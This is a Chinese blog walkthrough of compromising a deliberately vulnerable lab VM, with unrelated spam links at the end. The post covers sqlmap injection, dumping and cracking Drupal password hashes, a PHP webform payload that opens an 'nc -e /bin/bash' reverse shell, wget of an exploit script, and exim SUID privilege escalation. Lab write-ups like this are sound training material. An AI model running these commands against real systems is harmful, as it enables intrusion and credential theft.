当前位置: 首页 > news >正文

昆明学校网站建设网络营销方式方法

昆明学校网站建设,网络营销方式方法,做网页需要什么软件,wordpress建数据库步骤期末倒计时一周,发完这篇就要好好复习期末了,【许愿】 1.信息查询 1.1.Ip arp-scan -l 192.168.220.138 1.2.扫描端口 nmap -T4 -A -p- 192.168.220.138 接下来直接访问当前的主机,发现地址栏中的 nid 会发生变化,猜测可…

期末倒计时一周,发完这篇就要好好复习期末了,【许愿】

1.信息查询

1.1.Ip

arp-scan  -l

192.168.220.138

1.2.扫描端口

nmap -T4  -A  -p-  192.168.220.138

接下来直接访问当前的主机,发现地址栏中的 nid 会发生变化,猜测可能会存在 sql 注入漏洞

验证一下 sql 注入是否真的存在,随机给一个不存在的值 x,观察是否会报 sql 的错误信息,如果报了,说明存在 sql 注入

接下来就可以直接使用 sqlmap 进行攻击

sqlmap  -u  "http://192.168.220.138/?nid=1"  --current-db

sqlmap  -u  "http://192.168.220.138/?nid=1"  -D 'd7db'  --tables

获取当前数据库中的所有表,我们想要查看用户的信息可以进行登录,需要使用 users 表

sqlmap  -u  "http://192.168.220.138/?nid=1"  -D 'd7db'  -T 'users' --columns

获取出当前 users 表的字段,接下来获取值

sqlmap  -u  "http://192.168.220.138/?nid=1"  -D 'd7db'  -T 'users' -C 'name,pass'  --dump

获取当前的密码,但是密码加密了,接下来需使用 john --show 查看解密

$S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z

$S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF

vim dc8.txt

$S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z

$S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF

写进去然后保存

爆破密码

john dc8.txt

爆破出来的密码: turtle

可以尝试远程连接,但是不好使

1.3.扫描目录

dirsearch -u 192.168.220.138 -e* -i 200

发现了有/user/login 这个页面,接下来就直接访问,使用上面账号进行登录,发现只有 john 能登录成功

接下来需要找突破口,在 webform 中有新的发现

2. shell 反弹

选择 form setting,然后写入 shell 反弹脚本

<h1>xxxx</h1><?phpsystem("nc -e /bin/bash 192.168.126.138 7777");?>

注意选php

点击保存

然后需要写一些信息来进行提交

反弹成功,并设置python交互

使用 python 命令行脚本

python -c 'import pty;pty.spawn("/bin/bash")'

    3.提权

    然后接下来要做两件事情

    1. 进入到 home 目录,发现无任何价值信息

    2.sudo -l进行提权,发现不好使,接下来使用 suid 方式进行提权

    find / -user root -perm -u=s 2>/dev/null

    发现 exim4 在使用时具有 root 权限

    exim 是一个邮件传输的代理,用于在电子邮件服务器之间进行邮件交换和路由。

    4.发现exim的提权方式

    查看 exim4 的版本

    exim4  --version

    可以搜索这个版本的漏洞

    searchsploit exim

    搜索 46996 这个文件

    searchsploit  -p    linux/local/46996.sh

    接下来复制一份到本地,然后传递到靶机上

    cp  /usr/share/exploitdb/exploits/linux/local/46996.sh   46996.sh

    搭建 python 的服务器,用户传递数据

    python3  -m  http.server 8888

    搭建 python 的服务器,用户传递数据

    python3  -m  http.server 8888

    在靶机中先切换到/tmp.然后在进行 sh 文件的下载

    查看一下自己虚拟机的ip

    192.168.220.146

    ​
    cd  /tmpwget http://192.168.220.146:8888/46996.sh​

    给当前脚本一个执行权限

    chmod  777  46996.sh

    查看这个脚本内容,发现有两种提权方式

    ./46996.sh -m  netcat

    最后

    cd  /rootlscat flag.txt

    http://www.yidumall.com/news/97415.html

    相关文章:

  1. 滨海新区做网站电话宣传推广
  2. linux做ppt下载网站互联网营销师报考条件
  3. 网站开发android客户端刷网站seo排名软件
  4. wordpress 当前栏目id营销网站seo推广
  5. 创业做网站开发最近一周的新闻
  6. 嘉鱼网站建设公司网络推广推广
  7. dw做的网站如何上传云服务常用的搜索引擎有哪些?
  8. 运城建设网站企业网站排名优化公司
  9. 赣州市建设考勤在哪个网站站长查询域名
  10. 佛山中英文网站制作爱采购seo
  11. 如何看别人网站用什么做的太原seo管理
  12. 服务器做php网站吗深圳公司网络推广该怎么做
  13. 山东通app官网下载二维码seo排名的职位
  14. 网站开发服务器知识广告网络
  15. 租房合同 模板优化网站界面的工具
  16. wordpress搜索时间限制百度seo快速排名优化软件
  17. wordpress 双语网站广州线上教学
  18. wordpress常用模板上海百度seo公司
  19. 如何做网站豆瓣推广代理登录页面
  20. 网站建设开发公司网络舆情分析师
  21. 毕业设计代做的网站靠谱吗seo咨询师招聘
  22. 做网站靠流量挣钱视频营销
  23. 沈阳有资质做网站的公司百度浏览器网址大全
  24. 如何在解决方案中新建网站java培训学费多少钱
  25. 网站设计需要需要用小红书关键词排名优化
  26. 电子商城网站制作关键词排名查询网站
  27. 如何做淘宝二手网站百度图片识别
  28. 职业生涯规划大赛怎么准备长春百度推广排名优化
  29. 网易那个自己做游戏的网站是什么原因产品如何做网络推广
  30. 北京晨钟科技有限公司订单查询企业seo网站推广